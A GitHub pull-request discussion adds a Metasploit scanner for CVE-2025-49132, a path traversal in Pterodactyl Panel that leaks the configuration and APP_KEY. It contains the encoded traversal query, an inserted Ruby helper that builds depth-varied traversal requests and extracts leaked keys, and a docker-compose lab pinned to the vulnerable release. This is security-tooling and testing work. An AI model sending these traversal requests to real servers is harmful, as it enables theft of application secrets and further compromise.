
Conversation


@n05ec n05ec commented Dec 16, 2025

Description

This PR adds an auxiliary scanner module for CVE-2025-49132, a path traversal vulnerability in Pterodactyl Panel. The vulnerability allows unauthenticated attackers to read the configuration file (including APP_KEY) via the /locales/locale.json endpoint.

Verification

  • Start msfconsole
  • use auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132
  • set RHOSTS <vulnerable_ip>
  • run
  • Verify that the module detects the vulnerability and reports it.

@github-actions

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:


```ruby
register_options(
  [
    OptString.new('TARGETURI', [true, 'The target URI', '/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app']),
```
Contributor


Rather than force the user to manually perform both the traversal and the URL encoding themselves, the typical approach is to expose a FILENAME option (or similar) and a DEPTH option to specify the traversal depth. You can find many example modules with grep DEPTH modules/auxiliary/.

@n05ec
Author

n05ec commented Dec 17, 2025

@bcoles I have updated the module based on your feedback:

  1. Refactored the code to use DEPTH and FILE options instead of hardcoded URIs.
  2. Added the missing documentation file following the official template.
  3. Verified the module works locally with the new logic.

Please review it again. Thanks!
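Added example, not the PR's module code and not part of Metasploit: it shows the request-building pattern bcoles asked for (separate DEPTH and FILE options assembled into the encoded `locale` parameter, instead of a hardcoded `..%2F..%2Fconfig` TARGETURI) and a check of the JSON body for a leaked Laravel APP_KEY as described in the PR description. The helper names, the depth-iteration loop, the APP_KEY pattern (`base64:` plus a 44-character base64 string, Laravel's format for a 32-byte key) and the sample response are assumptions for illustration; the real response layout of `/locales/locale.json` is not described on this page.

```ruby
require 'json'
require 'uri'

# Hypothetical helpers (not the module's own code) for the DEPTH/FILE pattern.
ENDPOINT = '/locales/locale.json'.freeze

# Assemble DEPTH x "../" + FILE and URL-encode it, so the operator never has to
# hand-write "..%2F..%2F" as in the hardcoded TARGETURI default.
def traversal_query(depth:, file:, namespace: 'app')
  locale = URI.encode_www_form_component(('../' * depth) + file)
  "#{ENDPOINT}?locale=#{locale}&namespace=#{namespace}"
end

# A scanner rarely knows the install depth in advance; emit one candidate per
# depth so the caller can stop at the first response that leaks the key.
def candidate_queries(file:, max_depth: 5, namespace: 'app')
  (1..max_depth).map { |d| traversal_query(depth: d, file: file, namespace: namespace) }
end

# Laravel APP_KEY format: "base64:" followed by 44 base64 characters (32 bytes).
APP_KEY_RE = %r{\Abase64:[A-Za-z0-9+/]{43}=\z}

# Walk any parsed JSON value and return the first APP_KEY-looking string, else nil.
def find_app_key(node)
  case node
  when Hash   then node.each_value { |v| found = find_app_key(v); return found if found }
  when Array  then node.each { |v| found = find_app_key(v); return found if found }
  when String then return node if node.match?(APP_KEY_RE)
  end
  nil
end

# Parse a response body; a non-JSON body (404 page, HTML error) is "not vulnerable".
def leaked_app_key(body)
  find_app_key(JSON.parse(body))
rescue JSON::ParserError
  nil
end

# Constructed sample response (assumption: leaked config rendered as JSON).
# The key is the base64 encoding of 32 zero bytes, a placeholder, not a real key.
SAMPLE_KEY  = "base64:#{'A' * 43}=".freeze
SAMPLE_BODY = JSON.generate('app' => { 'name' => 'Pterodactyl', 'key' => SAMPLE_KEY, 'debug' => true })

if $PROGRAM_NAME == __FILE__
  puts candidate_queries(file: 'config', max_depth: 3)
  puts "leaked APP_KEY: #{leaked_app_key(SAMPLE_BODY) || 'none'}"
end
```

With `depth: 2` and `file: 'config'` the helper reproduces exactly the query the original TARGETURI default hardcoded; the module would send each candidate with `send_request_cgi` and report the host only when `leaked_app_key` returns a value, which avoids false positives on servers that answer every path with a 200 HTML page.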

This module exploits a path traversal vulnerability (CVE-2025-49132) in Pterodactyl Panel versions prior to the fixed release.
The vulnerability exists in the `/locales/locale.json` endpoint. It allows an unauthenticated attacker to manipulate the `locale` parameter to traverse directories and read arbitrary files on the server (e.g., configuration files containing sensitive keys).

To set up a vulnerable environment, you can install an older version of Pterodactyl Panel using the standard installation scripts or Docker, ensuring you do not apply the patch for CVE-2025-49132.
Contributor


If you setup Pterodactyl Panel using docker would you be able to paste the docker-compose.yml / Dockerfile here?

Author


Sure, I have applied the suggested change.

Here is the docker-compose.yml I used to set up the vulnerable environment (Pterodactyl Panel v1.11.10).

```yaml
version: '3.8'
services:
  database:
    image: public.ecr.aws/docker/library/mariadb:10.5
    restart: always
    environment:
      MYSQL_DATABASE: panel
      MYSQL_USER: pterodactyl
      MYSQL_PASSWORD: password
      MYSQL_ROOT_PASSWORD: root_password
    volumes:
      - db_data:/var/lib/mysql
    healthcheck:
      test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
      interval: 10s
      timeout: 5s
      retries: 3
      start_period: 30s

  cache:
    image: public.ecr.aws/docker/library/redis:alpine
    restart: always

  panel:
    # Pinned to the vulnerable release; do not bump this tag for the lab
    image: ghcr.io/pterodactyl/panel:v1.11.10
    ports:
      - "80:80"
    environment:
      DB_HOST: database
      DB_DATABASE: panel
      DB_USERNAME: pterodactyl
      DB_PASSWORD: password
      REDIS_HOST: cache
      APP_URL: "http://localhost"
      APP_ENV: "local"
      APP_DEBUG: "true"
      APP_SERVICE_AUTHOR: "[email protected]"
      APP_TIMEZONE: "Asia/Shanghai"
    depends_on:
      database:
        condition: service_healthy
      cache:
        condition: service_started
    volumes:
      - panel_data:/app/var/

volumes:
  db_data:
  panel_data:
```
